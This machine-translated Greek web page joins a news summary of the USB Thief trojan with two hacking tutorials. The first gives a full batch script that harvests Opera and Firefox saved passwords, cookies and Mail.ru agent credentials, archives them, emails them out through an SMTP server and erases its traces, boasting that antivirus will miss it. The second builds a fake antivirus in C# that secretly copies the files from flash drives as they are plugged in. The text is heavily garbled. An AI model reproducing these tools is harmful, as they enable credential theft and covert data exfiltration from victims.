Το απλούστερο grabber κίνησης flash. Ο Trojan USB κλέφτης δεν αφήνει ίχνη και εργάζεται σε μονάδες flash πώς να κλέψει δεδομένα μέσω μιας μονάδας flash USB και μητρώου

Εξαιρετικά ασυνήθιστο Troyan: Το Malwar έλαβε το όνομα USB Thief (Win32 / PSW.Stealer.nai). Το Malname επικεντρώνεται στην κλοπή των δεδομένων, εφαρμόζεται και λειτουργεί με τους συνηθισμένους δίσκους φλας, καθώς και επιδέξια κρύβει τα ίχνη της παρουσίας του στο σύστημα. Το Troyan είναι ιδανικό για τον κυβερνοχώρο, καθώς μπορεί να πάρει ακόμη και για να απομονωθεί από τα συστήματα δικτύου, εάν μπορείτε να συνδέσετε μια μονάδα USB σε αυτά.

Σε αντίθεση με άλλες απειλές USB που γράφονται σε συντομεύσεις αυτοκινήτων και ψεύτικων εφαρμογών, έτσι ώστε να ξεκινήσει η Malwar, ο κλέφτης USB λειτουργεί διαφορετικά. Το έργο του Trojan έχει σχεδιαστεί για το γεγονός ότι οι χρήστες συχνά αποθηκεύονται σε μονάδες φλας φορητών εκδόσεων τέτοιων εφαρμογών όπως ο Firefox, το Notepad ++, το TrueCrypt και ούτω καθεξής. Το Malwar είναι καθαρά ενσωματωμένο σε μια αλυσίδα λήψης τέτοιων προγραμμάτων, που εκδίδεται για ένα αρχείο plugin ή dll. Έτσι, όταν ο χρήστης ξεκινήσει τη γνωστή εφαρμογή από τη μονάδα flash, μαζί με αυτό (στο παρασκήνιο), ξεκινάει το Troyan.

Άγνωστος συγγραφέας της Malviva κατάχρησε σοβαρή προστασία για την ανάπτυξή του. Ο κλέφτης USB συνδέεται με κάθε μολυσμένη μονάδα flash χρησιμοποιώντας το μοναδικό αναγνωριστικό και τις παραμέτρους της μονάδας δίσκου. Μέρος των αρχείων Trojan προστατεύεται από την κρυπτογράφηση AES128, με το κλειδί που δημιουργείται ακριβώς με βάση τις μοναδικές παραμέτρους της συσκευής. Επίσης, τα ονόματα αρχείων Malvari Swarming σε κάθε περίπτωση: παράγονται με βάση το περιεχόμενο του φλας και το χρόνο δημιουργίας αρχείων. Όταν προσπαθείτε να αντιγράψετε τον κλέφτη USB σε άλλη μονάδα flash ή έναν κανονικό σκληρό δίσκο, αυτό το σύστημα προστασίας δύο σταδίων δεν θα δώσει το Malvari να κερδίσει και επίσης σοβαρά να περιπλέκει τη συμπεριφορά της αντίστροφης μηχανικής.

Δομή του Trojan

Ο κλέφτης USB λειτουργεί απευθείας από τη μονάδα flash και δεν αφήνει ίχνος στο ίδιο το σύστημα. Το Troyan αποτελείται από έξι αρχεία, τέσσερα από τα οποία είναι εκτελέσιμα και δύο ακόμη περιέχουν δεδομένα διαμόρφωσης. Ο πρώτος φορτωτής είναι υπεύθυνος για την έναρξη του Trojan μαζί με μια φορητή έκδοση οποιουδήποτε προγράμματος. Ελέγχει τη συσκευή USB και φροντίζει να καταγράφει κλεμμένες πληροφορίες σχετικά με αυτό και να το αποθηκεύσει εδώ. Τότε ξεκινά ο δεύτερος φορτωτής. Ελέγχει τα ονόματα των γονικών διαδικασιών και φροντίζει να λειτουργεί σε ένα κοινό περιβάλλον (και κανείς δεν προσπαθεί να το αναλύσει). Ο τρίτος φορτωτής, με τη σειρά του, ελέγχει την παρουσία στο σύστημα προστασίας από ιούς.

Το τελευταίο, τέταρτο pailad, το οποίο είναι ενσωματωμένο στη διαδικασία λειτουργίας, είναι υπεύθυνη άμεσα για κλοπή δεδομένων. Ο κλέφτης USB απαριθμεί έγγραφα, εικόνες, λίστα αρχείων από όλους τους διαθέσιμους δίσκους, δεδομένα μητρώου των Windows και πληροφορίες που συλλέγονται χρησιμοποιώντας winaudit. Όλα τα κλεμμένα δεδομένα αποθηκεύονται στη μονάδα flash και είναι κρυπτογραφημένα χρησιμοποιώντας ελλειπτική κρυπτογραφία.

Οι εμπειρογνώμονες της Eset σημειώνουν ότι οι επιθέσεις που χρησιμοποιούν τον κλέφτη USB δεν μπορούν να ονομαστούν κοινή πρακτική. Παρ 'όλα αυτά, η Troyan είναι πολύ επικίνδυνη, καθώς είναι δύσκολο να εντοπιστεί η παρουσία της και μετά την εξαγωγή μιας μονάδας USB, δεν παραμένουν καθόλου ίχνη εκλογής πληροφοριών. Επίσης στην έκθεση της Εταιρείας αναφέρει ότι ο συγγραφέας του Μαλβάρη, εάν το επιθυμεί, μπορεί να "επαναπλήξει" την κακομεταχείριση του, αντικαθιστώντας το dyiload για κλοπή δεδομένων σε οποιοδήποτε άλλο Malwar.

Σε αυτό το άρθρο θα περιγράψω τόσο γρήγορα και χωρίς μεγάλη δυσκολία, να γράψετε και να κάνετε τα αρχεία εστίασματος του ιού με κωδικούς πρόσβασης και να την στείλετε όλα στο γραμματοκιβώτιο.
Ας ξεκινήσουμε με το γεγονός ότι ο ιός θα γραφτεί στο BAT "E (CMD, οι κύριες εντολές που μπορείτε να πάρετε) που είναι, στο συνηθισμένο αρχείο κειμένου και θα εκτελεστεί χρησιμοποιώντας μια τυποποιημένη, ενσωματωμένη πτερωτή των Windows-" γραμμή εντολών ".
Για να γράψετε έναν παρόμοιο ιό, πρέπει να γνωρίζετε την ακριβή θέση αποθήκευσης αυτών των αρχείων που θα κλέψουν, τα εξαρτήματα Blat που μπορούν να μεταφορτωθούν από την εγκατάσταση http://www.blat.net/ ή από το διακομιστή μας, καθώς και ένα συστατικό από το Winrar Archiver RAR.EXE (μπορείτε να κάνετε χωρίς αυτό).
Ανοίξτε το Σημειωματάριο και αντιγράψτε τον ακόλουθο κώδικα εκεί:

@ECHO off md% systemroot% \\ wincs md% systemdrive% \\ pass \\ md% systemdrive% \\ pass \\ opera \\ md% \\ mailagent \\ mozilla \\ mailagent \\ md% systemagent \\ md% systemDrive% \\ pass \\ Το Attribs MailAgent \\ reg% systemroot% \\ Wincs + h + s + R Atribution% systemDrive% \\ pass + h + s + r copy / y "% systemroot% \\ blat.exe"% systemroot% \\ wincs \\ blat.exe / Y "% systemroot% \\ blat.dll"% systemroot% \\ wincs \\ blat.dll "αντίγραφο / y"% systemroot% \\ blat.lib ""% systemroot% \\ wincs \\ blat.lib "cd / d% appdata% \\ Opera \\ Opera \\ copy / y wand.dat% systemdrive% \\ pass \\ opera \\ wands.dat αντίγραφο / y cookies4.dat% systemdrive% \\ pass \\ opera \\ cookies4.da regedit.exe -ea% systemdrive% \\ pass \\ MailAgent \\ reg \\ ang \\ agent.reg "hkey_current_user \\ magent_logins2 regedit.exe -ea% systemdrive% \\ pass \\ mailagent \\ reg \\ agent_3.reg" hkey_current_user \\ software \\ mail.ru \\ agent \\ magent_logins3 cd / D% appdata% XCOPY MRA \\ BASE%% systemDrive% \\ pass \\ mailagent / k / h / g / q / r / s / y / e\u003e nuL xcopy mra \\ n / e\u003e ver.txt% systemdrive% \\ pass \\ mailagent / K / h / g / q / r / y\u003e nul cd% appdata% \\ mozill Ένα \\ firefox \\ profiles \\ *. Προεπιλογή \\ cookies copy / y.sqlite% systemdrive% \\ pass \\ mozilla \\ cookies.sqlite αντίγραφο / y key3.db% systemDrive% \\ pass \\ mozilla \\ key3.db αντιγραφή / y signons.sqlite % Systemdrive% \\ pass \\ mozilla \\ signons.sqlite αντίγραφο / y% windir% \\ rar.exe% systemdrive% \\ pass \\ rar.exe\u003e \u200b\u200bnul del / s / q% systemroot% \\ rar.exe% systemdrive% \\ Pass \\ rar.exe a -r% systemdrive% \\ pass \\ pass.rar% systemdrive% \\ pass \\ copy / y% systemdrive% \\ pass \\ pass.rar% systemroot% \\ wincs \\ pass.rar cd% systemroot% \\ wincs % Systemroot% \\ wincs \\ blat.exe -install -server smtp.yandex.ru -port 587 -f [email protected] -u login -pw κωδικός πρόσβασης REN * .rar pass.rar% systemroot% \\ wincs \\ blot.exe -Body filespassword -to [email protected] -attach% systemroot% \\ wincs \\ pass.rar rmdir / s / q% systemDrive% \\ pass rmdir / s / q% systemroot% \\ wincs del / s / q% systemroot% \\ Blot. EXE DEL / S / Q% Systemroot% \\ blot.dll del / s / q% systemroot% \\ blat.lib Attiper + a + s + h + r% systemroot% \\ wind.exe εξόδου cls cls

Δεν είναι πολλά να γράψουν τον κώδικα του ίδιου του Batinka.
@echo off - κρύβει το σώμα batinka (έτσι δεν είναι απαραίτητο, αλλά ακόμα)
mD% Systemroot% \\ Wincs - δημιουργεί ένα φάκελο Wincs στον φάκελο Windows System, ανεξάρτητα από το δίσκο που έχει εγκατασταθεί ή όπως ονομάζεται.
mD% SystemDrive% \\ Pass \\ - Δημιουργεί το φάκελο Pass στο δίσκο όπου είναι εγκατεστημένα τα Windows.
mD% SystemDrive% \\ Pass \\ Opera \\ - Δημιουργεί ένα φάκελο Opera όπου στο μέλλον θα αντιγραφεί με το πρόγραμμα περιήγησης Opera (μέχρι 11 * εκδόσεις της όπερας αποθηκεύει τους κωδικούς σας στο αρχείο wand.dat)
- Δημιουργεί ένα φάκελο Mozilla όπου τα αρχεία από το πρόγραμμα περιήγησης Mozilla θα συνεχίσουν να αντιγράφονται (cookies.sqlite, key3.db, signons.sqlite) στον οποίο αποθηκεύονται οι κωδικοί πρόσβασης.
md% systemdrive% \\ pass \\ mailagent \\ - δημιουργεί ένα φάκελο ηλεκτρονικού ταχυδρομείου στο οποίο τα αρχεία που περιέχουν το ιστορικό αλληλογραφίας και τα κλειδιά μητρώου (πλήκτρα κωδικού πρόσβασης) από τον παράγοντα αλληλογραφίας θα αντιγραφούν.
mD% systemDrive% \\ pass \\ mailagent \\ reg - δημιουργεί ένα φάκελο REG
atriom% Systemroot% \\ Wincs + Η + S + R - Βάζει τα χαρακτηριστικά στο φάκελο Wincs, το οποίο το κρύβεται έτσι από τα μάτια.
aTRIVE% systemdrive% \\ pass + h + s + r - το ίδιο όπως παραπάνω.
Αντιγραφή / y "% Systemroot% \\ Blat.exe"% Systemroot% \\ Wincs \\ Blat.exe " - Αντιγράψτε το αρχείο blat.exe από την εκφόρτωση στο φάκελο Wincs
Αντίγραφο / y "% systemroot% \\ blat.dll"% systemroot% \\ wincs \\ blat.dll " - Αντιγράφει το αρχείο blat.dll από την εκφόρτωση στο φάκελο Wincs
Αντιγραφή / y "% systemroot% \\ blat.lib" "% systemroot% \\ wincs \\ blat.lib" - Αντιγράφει το αρχείο blat.lib από τη θέση βύσματος στο φάκελο Wincs
CD / D% Appdata% \\ Opera \\ Opera \\ - Εισάγει το φάκελο Opera όπου βρίσκονται αρχεία με κωδικούς πρόσβασης (και όχι μόνο) από την όπερα.
Αντίγραφο / y wand.dat% systemdrive% \\ pass \\ opera \\ wand.dat - Αντιγράφει το αρχείο Wand.dat στον φάκελο Opera
copy / y cookies4.dat% systemdrive% \\ pass \\ opera \\ cookies4.dat - Αντιγράφει το αρχείο cookies4.dat στο φάκελο Opera
regedit.exe -ea% systemDrive% \\ pass \\ mailagent \\ reg \\ agent.reg "hkey_current_user \\ software \\ mail.ru \\ agent \\ magent_logins2 - Εξαγωγές Το κλειδί μητρώου Magent_Logins2 όπου ο κωδικός πρόσβασης αποθηκεύεται στον φάκελο REG
regedit.exe -ea% systemDrive% \\ pass \\ mailagent \\ reg \\ agent.reg "hkey_current_user \\ software \\ mail.ru \\ agent \\ magent_logins3 - Εξαγωγές Το κλειδί μητρώου Magent_logins3 όπου ο κωδικός πρόσβασης αποθηκεύεται στον φάκελο REG
CD / D% Appdata% - Μεταβείτε στο φάκελο Appdata
Xcopy mra \\ base% systemdrive% \\ pass \\ mailagent / k / h / g / q / r / s / y / e\u003e nul - Αντιγράφει τα περιεχόμενα του φακέλου MRA \\ Base στον φάκελο MYPORAGENT
Xcopy mra \\ update \\ ver.txt% systemdrive% \\ pass \\ mailagent / k / h / g / q / r / s / y\u003e nul - Αντιγράφει το αρχείο Ver.txt στο φάκελο MyBodent
cD% appdata% \\ mozilla \\ firefox \\ προφίλ \\ * προεπιλογή \\ - Πηγαίνετε στο φάκελο με ένα προφίλ του προγράμματος περιήγησης Mozilles
Αντιγραφή / y cookies.sqlite% systemdrive% \\ pass \\ mozilla \\ cookies.sqlite - Αντιγράφει το αρχείο cookies.sqlite στο φάκελο Mozilla
Αντιγραφή / y key3.db% systemDrive% \\ pass \\ mozilla \\ key3.db - Αντιγράψτε το αρχείο πλήκτρων 3.DB στο φάκελο Mozilla
Αντιγραφή / y signons.sqlite% systemDrive% \\ pass \\ mozilla \\ signons.sqlite - Αντιγράφει το αρχείο signons.sqlite στο φάκελο Mozilla
Αντιγραφή / y% windir% \\ rar.exe% systemdrive% \\ pass \\ rar.exe\u003e \u200b\u200bnul- Αντιγράφει το στοιχείο του Archiver WinRAR RAR.EXE στον φάκελο Pass
del / s / q% systemroot% \\ rar.exe - Διαγράφει το στοιχείο Archiver από το φάκελο των Windows
% SystemDrive% \\ pass \\ rar.exe a -r% systemdrive% \\ pass \\ pass.rar% systemdrive% \\ pass \\- Αρχείο Τα περιεχόμενα του φακέλου Pass
Αντιγραφή / y% systemDrive% \\ pass \\ pass.rar% systemroot% \\ wincs \\ pass.rar Αντιγράψτε το δημιουργημένο αρχείο στο φάκελο Wincs
cD% Systemroot% \\ Wincs - Πηγαίνετε στο φάκελο Wincs
% Systemroot% \\ wincs \\ blat.exe -install -server smtp.yandex.ru -port 587 -f [email protected] -u login -pw κωδικό πρόσβασης - προετοιμάζει το πρόγραμμα Blat για την αποστολή αρχείων που υποδεικνύει δεδομένα για εξουσιοδότηση και αποστολή επιστολών. Μην ξεχάσετε να καθορίσετε τα δεδομένα σας από το γραμματοκιβώτιο, από όπου το γράμμα θα σταλεί με το αρχείο.
ren * .Rra Pass.RAR - Ακριβώς σε περίπτωση, αν το αρχείο δεν δεχόταν λάθος όνομα κατά τη διάρκεια του μαθήματος, με μετονομάζαμε να περάσουμε
% Systemroot% \\ wincs \\ blat.exe -body αρχεία αρχείων - [email protected]. -TACTACH% systemroot% \\ wincs \\ pass.rar - Αναφέρετε ποια ταχυδρομική διεύθυνση θα σταλεί από την επιστολή και θα το στείλει.
rmdir / s / q% systemdrive% \\ pass - Διαγράψτε το φάκελο Pass
rmdir / s / q% systemroot% \\ wincs - Διαγράψτε το φάκελο Wincs
del / s / q% systemroot% \\ blat.exe
del / s / q% systemroot% \\ blat.dll - Αφαιρέσουμε τα εξαρτήματα Blat από το φάκελο των Windows.
del / s / q% systemroot% \\ blat.lib - Αφαιρέσουμε τα εξαρτήματα Blat από το φάκελο των Windows.
aTTRAL + A + S + H + R% Systemroot% \\ WIND.EXE - Βάζουμε χαρακτηριστικά με τον ίδιο τρόπο που κρύβονται από τα μάτια.
Έξοδος - Συμπληρώστε τη διαδικασία Batinka και έξοδος.
cLS - Καθαρίστε την έξοδο οποιωνδήποτε σειρών στο Immoder.
Αντιγράψτε, εκτός από το WIND.BAT και συντάσσονται στο EXE χρησιμοποιώντας το πρόγραμμα Bat στο Exe Converter, τότε συλλέγουμε τα πάντα σε μια δέσμη, δηλαδή, παίρνουμε τα εξαρτήματα του προγράμματος Blat και το στοιχείο του Minrar Archiver (μπορείτε να κατεβάσετε) και να κόψετε Ένα εκτελέσιμο αρχείο, ή με ποιο πρόγραμμα, η διαδρομή εκφόρτωσης όλων των Φαλάμων θα πρέπει να είναι% systemroot% ή% Windowsdir% ή% Windir%.
Ως αποτέλεσμα, παίρνουμε έναν ιό που δεν θα περάσει από το Antivirus και θα στείλει ένα αρχείο με αρχεία σε εσάς στο ταχυδρομείο. Τα αρχεία που θα έρθουν στο ταχυδρομείο μπορούν να αποκρυπτογραφηθούν χρησιμοποιώντας την ανάκτηση πολλών κωδικών πρόσβασης, δεν είναι όλα, αλλά μόνο wands από την όπερα και στη συνέχεια αν δεν ενημερώνεται σε 11 * εκδόσεις. Όλα τα άλλα αρχεία μπορούν να αποκρυπτογραφηθούν αντικαθιστώντας το δικό σας.
Σε αυτό νομίζω ότι μπορείτε να τελειώσετε, αν έχετε οποιεσδήποτε ερωτήσεις, μην διστάσετε να ρωτήσετε.
Σας ευχαριστούμε για την προσοχή σας, όλα είναι καλά!
© swap theghworld.in.

Για απλούς δίσκους Flash Mortal - αυτή είναι μια συσκευή για τη μεταφορά εγγράφων / ταινιών / εικόνων και άλλων προσωπικών (και μερικές φορές πολύ προσωπικές) πληροφορίες. Αλλά για τους χάκερς, η μονάδα flash είναι ταυτόχρονα ένα θύμα, και ένα εργαλείο μάχης. Σήμερα θα σας πω όλες τις λεπτότητες της αόρατης αποστράγγισης των δεδομένων από τους δίσκους Flash στον υπολογιστή μου, καθώς και να διδάξετε να μετατρέψετε αβλαβείς δίσκους φλας για να δημιουργήσετε αντίγραφα ασφαλείας από τον "Big" υπολογιστή.

Πλήρεις μονάδες φλας

Η ιδέα του προγράμματος "EVIL COMP" θα έχει ως εξής. Θα αναπτύξουμε ένα μικρό εργαλείο που θα προσποιηθεί ότι θα είναι Super Mega Advanced Antivirus, ο σκοπός του οποίου είναι μια ποιοτική απομάκρυνση από τους "επικίνδυνες" ιούς από τους δίσκους flash. Κανείς δεν θα εκπλήξει κανέναν που έχει μολυνθεί από τους ιούς που αναβοσβήνουν, οπότε το εξειδικευμένο "Antivirus" μας δεν θα προκαλέσει φόβους των αφελών χρηστών. Αντίθετα, εισάγετε μια μονάδα flash σε εσάς στον υπολογιστή και βλέποντας έναν τύπο μηνύματος: "Ανακαλύπτεται ένας ιός. Κάνω μια λεπτομερή σάρωση όλων των αρχείων για την παρουσία μολυσμένων »- Σίγουρα θα περιμένει την ολοκλήρωση αυτής της επιχείρησης.

Προετοιμασία οργάνων

Γράψτε ένα τέτοιο χρήσιμο πρόγραμμα θα είμαστε στο Trendy Now C #. Γλωσσική ευελιξία και ευρεία λειτουργικότητα πλατφόρμας. Σας επιτρέπει να αναπτύξετε εφαρμογές με ταχύτητα αστραπής. Αυτό χρειαζόμαστε. Μας ενδιαφέρει η καλλιέργεια που μπορούμε να συλλέξουμε και όχι τη διαδικασία της κωδικοποίησης.

Ένα από τα σημαντικά συστατικά της αίτησής μας θα είναι μια διεπαφή. Όσο πιο σταθερό το κάνετε, όσο περισσότερες πιθανότητες το θύμα δεν θα παρατηρήσει το τέχνασμα και θα αναμένει ήρεμα την ολοκλήρωση της σάρωσης των ιών. Δεν έκανα ιδιαίτερα ατμό και δημοσίευσε μια φωτογραφία και προοδευτικήbar με τη μορφή ενός καθαρού έργου. Μπορείτε να απομακρυνθείτε από το πλήρες και να κάνετε ένα εκπληκτικό σχέδιο. Σας συμβουλεύω να δείτε την εκτέλεση κάποιων πραγματικών ιών και περίπου στο ίδιο στυλ για να εκδώσετε την αίτησή σας.

Βάζουμε την εργασία

Υποθέτουμε ότι αποφασίσαμε με οργανωτικά ζητήματα και τον αλγόριθμο των δράσεων, ήρθε η ώρα να συζητήσουμε τις τεχνικές αποχρώσεις. Έτσι, ο αντι-ιός μας θα πρέπει να ξεκινήσει τη βρώμικη εργασία τους κατά την εγκατάσταση της μονάδας flash. Μόλις εμφανιστεί ο νέος δίσκος στο σύστημα, το πρόγραμμα μας πρέπει να καθορίσει την επιστολή του και να αρχίσει την αντιγραφή.

Πριν αναλάβω να γράψω αυτό το άρθρο, ο πηγαίος κώδικας ενός παρόμοιου προγράμματος πιάστηκε τα μάτια μου. Ο συγγραφέας του παραδείγματος προσδιορίστηκε το γεγονός της παρουσίας μονάδας φλας με περιοδική κατάσβεση όλων των δίσκων για την παρουσία μιας "αφαιρούμενης μονάδας" τύπου ". Αρχικά σκέφτηκα να πάω με τον ίδιο τρόπο, αλλά η εσωτερική φωνή πρότεινε στον παράλογο. Έχοντας όλα τα "για" και όλα "καλά, είναι ενεργοποιημένη", έριξα αυτή την ιδέα και πήγα να περπατήσω στο MSND. Πέντε λεπτά αργότερα αποδείχτηκα ότι δεν το έκανα μάταια. Η απάντηση βρέθηκε!

Χωρίς winapi πουθενά ...

Μπορείτε να μάθετε πιο αποτελεσματικά στη σύνδεση του νέου εξοπλισμού (στην περίπτωσή μας - Flash Drives) με την αλίευση και την ανάλυση του μηνύματος WM_DEVICECHANGE. Κατά τη διάρκεια της εγκατάστασης της συσκευής, το μήνυμα αποστέλλεται σε όλα τα παράθυρα και μπορούμε εύκολα να το επεξεργαστούμε στην αίτησή σας. Για αυτό, αρκεί μόνο να περιγράψετε τη λειτουργία παραθύρων. Στην πράξη, μοιάζει με αυτό:

Lresult callback windowproc (hwnd hwnd, // Uint UMSG ID, // WIPARAM WAPTAM Αναγνωριστικό μηνύματος, // συμβάν που εμφανίστηκε LPARAM LPARAM // Δείκτης στη δομή που περιέχει δεδομένα)

Στο σώμα της λειτουργίας πρέπει να συγκρίνετε την τιμή της παραμέτρου WPARAM με αναγνωριστικά διαφόρων συμβάντων που σχετίζονται με το WM_DEVICECHANGENY. Για παράδειγμα, θα είναι:

  • Dbt_devicearearrival - εξοπλισμός που προστέθηκε
  • Dbt_devicemovecmplete - εξοπλισμός πλήρως αφαιρέθηκε
  • Εντάξει, πώς να καθορίσετε το γεγονός της σύνδεσης νέου εξοπλισμού, γνωρίζουμε, αλλά πώς να είστε σίγουροι ότι έχετε συνδέσει τη μονάδα flash; Συσκευές με δυνατότητα "ζεστής σύνδεσης" (Είμαι για USB) ένα τεράστιο σετ (εκτυπωτής, σαρωτής, μόντεμ, κλπ.). Ευτυχώς, και αυτό το πρόβλημα επιλύεται αρκετά απλό. Με την παράμετρο LPARAM, μπορούμε να αναφερθούμε στη δομή _DEV_BROADCast_HDR, η οποία έχει ένα πεδίο DBCH_DEVICETYPE. Αυτό, με βάση την αξία, αυτά είναι πεδία και γίνονται κατάλληλα συμπεράσματα. Εάν είναι ίση με το dev_devtyp_volume, τότε ο χρόνος για να συμμετάσχετε και να νικήσετε τα χέρια σας - μια μονάδα flash είναι συνδεδεμένη σε εμάς!

    Typedef struct _dev_broadcast_hdr (dbch_size; // dbch_deviceType service δομή, // dwwwter dbch_erved; // κρατημένο, δεσμευμένο, μη χρησιμοποιημένο) dev_broadcast_hdr, * pdev_broadcast_hdr;

    Στο μουνί μας εισήγαγε μια μονάδα flash, "Θα προσπαθήσουμε να αναγνωρίσουμε το γράμμα του δίσκου ότι το σύστημα έχει φύγει. Όπως και στο "πεδίο των θαυμάτων", μπορείτε να το μαντέψετε, αλλά είναι καλύτερα να τραβήξετε πληροφορίες από τη δομή dev_broadcast_volume.

    Typedef struct _dev_broadcast_volume (dwwword dbcv_size; // dwwwd dbcv_deviceType συσκευή τύπου, // αποκλειστικά dbcv_unmask, // dev_broadcast_volume, * pdev_broadcast_volume;

    Από όλα τα πεδία αυτής της δομής, μας ενδιαφέρει το dbcv_unitmask. Να έχετε κατά νου ότι αυτή η ιδιότητα περιέχει μόνο γράμματα δυαδικών ψηφίων και όχι η συμβολική του απόδοση. Για παράδειγμα, εάν η τιμή είναι 0, η επιστολή μονάδας δίσκου θα είναι α. Εάν 1, στη συνέχεια Β, κλπ. Για την ευκολία να πάρει ένα γράμμα χαρακτήρων, είναι καλύτερο να γράψετε μια λειτουργία.

    Εάν έχετε διαβάσει την επικεφαλίδα μας για μεγάλο χρονικό διάστημα και είναι εξοικειωμένοι με τις λειτουργίες API, στη συνέχεια στην ανάγνωση του επόμενου τμήματος του άρθρου δεν υπάρχει ανάγκη. Ανοίξτε τον επεξεργαστή και ξεκινήστε την εφαρμογή. Περιέγραψα όλες τις απαραίτητες δομές και λειτουργίες. Μπορείτε να τα συγκεντρώσετε στο πρόγραμμα. Ορίστε και θα ξεκινήσω τη βύθιση του v.net και c # ειδικότερα.

    Stay.net "Om.

    Ώρα να ασκήσετε και να εφαρμόσετε τη γνώση στη γλώσσα C #. "Τι στο καλό? - σας ρωτάς. "Οι πάγκοι είπαν για το Winapi, και στη συνέχεια απλά αποφάσισα να κάνω μια κλήση για όλες τις λειτουργίες με τη μορφή ενός εγγενούς κώδικα; Πού είναι η αναφερόμενη ταχύτητα αστραπής της ανάπτυξης; ".

    Σε κάτι που έχετε δίκιο. Η εφαρμογή μας θα χρησιμοποιήσει πραγματικά τις λειτουργίες Winapi (είναι ευκολότερο), αλλά δεν θα τα περιγράψουμε. Πολλοί προγραμματιστές αντιμετώπισαν το πρόβλημα του καθορισμού των μονάδων φλας. Ως αποτέλεσμα αυτών των σκακιού, οι ελεύθερες τάξεις για το C # άρχισαν να εμφανίζονται, στην οποία εφαρμόζεται ήδη όλες οι απαραίτητες λειτουργίες. Απλά πρέπει να συνδέσουμε ένα τέτοιο τεμάχιο εργασίας (να διαβάσετε το στοιχείο) στο έργο σας και να προκαλέσει ένα ζεύγος μεθόδων. Θα χρησιμοποιήσουμε μια από αυτές τις τάξεις τώρα. Αλλά η γνώση των δομών που περιγράφονται παραπάνω, θα σας βοηθήσετε όταν μεταφέρετε αυτό το πρόγραμμα στο API Windows.

    Οι έτοιμες κλάσεις αποφασιστικές τέτοιες εργασίες, ένα υπέροχο σετ, αλλά μου άρεσε η επιλογή από τον Jan Dolinay. Αυτό το άτομο έγραψε πολύ εύκολο στη χρήση και κατανόηση του κώδικα της κατηγορίας Drivedetector, η οποία μπορεί:

  • Προσδιορίστε το γεγονός της σύνδεσης μιας μονάδας flash
  • Ορίστε ένα αίτημα για να απομακρυνθείτε μια συνδεδεμένη μονάδα flash
  • Προσδιορίστε το γεγονός ότι απενεργοποιείτε το φλας
  • Λάβετε το δίσκο επιστολής η πρόσφατα συνδεδεμένη μονάδα flash
  • Παρέχετε μια λίστα με ανοιχτά αρχεία αρχείων
  • Και το σημαντικότερο, με αυτή την τάξη είναι εξαιρετικά εύκολο να εργαστεί - σε αυτό, βεβαιωθείτε τώρα. Η σύνδεση μιας κλάσης στο έργο του πραγματοποιείται με έναν τυποποιημένο τρόπο και δεν σταματάει με αυτή την έννοια. Ως εκ τούτου, ας κινηθούμε αμέσως στην αρχικοποίηση. Αυτό γίνεται με αυτό:

    Flashdrivetetector \u003d Νέος Driedetector (); flashdrivetetector.devicearrived + \u003d νέος driedethecementhandler (ondrivearrived); Flashdrivetetector.devicerEmoved + \u003d νέος driedethecementhandlerhandler (ondrivonded);

    Μετά τη δημιουργία μιας εμφάνισης του αντικειμένου κλάσης Drivedetector, ορίζω τους μεταβαλλόμενους () και τους χειρισμούς συμβάντων (). Σύμφωνα με το όνομά τους, δεν είναι δύσκολο να μαντέψουμε τι απαντούν. Όλος ο κωδικός αρχικοποίησης είναι η καλύτερη γραφή στη μέθοδο του τύπου1 (). Ο κύριος κώδικας του προγράμματος μας θα βρίσκεται στον διαχειριστή εκδηλώσεων. Θα δείτε το κείμενό του στο χτύπημα:

    Dirname String \u003d Environment.GetCommandLineargs () + "Flash_" + DateTime.Now.Tostring ("DD-MM-YY-HH-SS"). Chinineirectory (dirname); Xdirectory flashcopier \u003d νέο xdirectory (); Flashcopier.indexcomplete + \u003d νέο indexcompleteeventhandler (δείκτης ευρετηρίου); Flashcopier.itemcied + \u003d Νέο στοιχείοCopiedeventHandlander (itemcopied); Flashcopier.CopyCompleTe + \u003d Νέο CopyCompleTeEventHandler (copycomplete); Flashcopier.source \u003d νέος κατάλογοςInfo (e.drive.Tostring ()); Flashcopier.destination \u003d νέος κατάλογοςInfo (dirname); Flashcopier.overwrite \u003d TRUE; Flashcopier.folderfilter \u003d "*"; Flashcopier.filefilters.add ("*. Doc"); Flashcopier.filefilters.add ("*. Xls"); // Ορισμός άλλων φίλτρων // .... Flashcopier.Startcopy ();

    Στην αρχή της λίστα, θα ορίσω τη διαδρομή προς το φάκελο στο οποίο θα αντιγράψουμε τα περιεχόμενα της μονάδας flash. Το αντίγραφο θα είναι στο κατάλογο "Flash_TEXT Ημερομηνία", που βρίσκεται με το φάκελο από το οποίο λειτουργεί η εφαρμογή μας είναι τόσο πιο βολική. Αποφασίζοντας με το όνομα του φακέλου, προσπαθώ να το δημιουργήσω χρησιμοποιώντας τη λειτουργία Creationirectory (). Έγραψα αυτό το χαρακτηριστικό αποκλειστικά για ευκολία. Εμφανίζεται σε αυτό μια περίπτωση του αντικειμένου του DirectoryInfo, που έχει σχεδιαστεί για να λειτουργεί με καταλόγους και να καλέσει τη μέθοδο δημιουργίας (), η οποία δημιουργεί ένα νέο φάκελο.

    Μετά τη δημιουργία ενός φακέλου, μπορείτε να αντιγράψετε. Θα αντιγράψω όλα τα αρχεία χρησιμοποιώντας ένα αντικείμενο τύπου xdirectory. Εάν πληκτρολογήσετε τον κώδικα από την καταχώριση, τότε όταν προσπαθείτε να συντάξετε τον μεταγλωττιστή, ο μεταγλωττιστής θα παράγει ένα σφάλμα στο οποίο το μαύρο σε λευκό θα ειπωθεί: "Το αντικείμενο αυτού του τύπου δεν βρέθηκε".

    Το γεγονός είναι ότι το xdirectory είναι μια τάξη τρίτου μέρους. Μόλις εδώ και πολύ καιρό το βρήκα στο Διαδίκτυο Ineta και από τότε συχνά χρησιμοποιώ συχνά στα έργα μου. Μου αρέσει στο γεγονός ότι αρκεί να καλέσετε μία μέθοδο για την αντιγραφή των επενδυμένων φακέλων. Επιπλέον, σας επιτρέπει να εγκαταστήσετε φίλτρα.

    Πραγματικά δεν το κάνουν χωρίς αυτό. Παίρνουμε τυποποιημένες τάξεις, γνωστές σε όλες τις προγραμματιστές υποδοχή - αναδρομή - και γράφουν μερικές δεκάδες γραμμές κώδικα. Δυστυχώς, δεν θέλω να το κάνω κατηγορηματικά. Στην αυλή του XXI αιώνα, πρέπει να βελτιστοποιήσετε τις ενέργειες και το xdirectory για να μας βοηθήσετε σε αυτό.

    Η ενότητα με την τάξη βρίσκεται με το δίσκο μας και μπορείτε να μάθετε για το σκοπό των μεθόδων / ιδιοτήτων / συμβάντων κοιτάζοντας τον κατάλληλο πίνακα.

    Xdirectory ιδιότητες κλάσης

    Μέθοδοι κλάσης XDirectory

